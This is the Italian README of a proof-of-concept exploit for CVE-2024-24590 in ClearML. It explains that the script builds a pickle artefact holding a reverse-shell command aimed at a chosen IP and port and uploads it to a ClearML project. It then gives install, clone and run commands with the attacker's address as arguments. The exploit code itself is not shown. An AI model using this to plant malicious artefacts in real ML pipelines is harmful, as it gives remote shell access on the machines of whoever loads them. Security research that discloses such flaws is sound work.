
Prova di concetto per CVE-2024-24590
_____ _ __ __ _ _____ ____ _____
/ ____| | | \/ | | | __ \ / __ \ / ____|
| | | | ___ __ _ _ __| \ / | | | |__) | | | | |
| | | |/ _ \/ _` | '__| |\/| | | | ___/| | | | |
| |____| | __/ (_| | | | | | | |____ | | | |__| | |____
\_____|_|\___|\__,_|_| |_| |_|______| |_| \____/ \_____| - 2024-24590 x OxyDe
Questo progetto dimostra come caricare dinamicamente un artefatto pickle su ClearML con parametri configurabili tramite argomenti della riga di comando. Lo script inizializza un task ClearML, configura dinamicamente un comando per l'esecuzione di una reverse shell e lo carica come artefatto. (PoC-CVE-2024-24590)
Riferimento : https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
clearmlargparsepickleosInstallare il pacchetto ClearML:
pip install clearml
Clonare il repository:
git clone https://github.com/OxyDeV2/PoC-CVE-2024-24590.git
cd PoC-CVE-2024-24590
Per eseguire lo script, usare il seguente comando con gli argomenti appropriati:
python script.py --project_name "<project_name>" --task_name "<task_name>" --tags <tag1> <tag2> ... --artifact_name "<artifact_name>" --ip "<ip_address>" --port "<port>"
Grazie a Skriix :)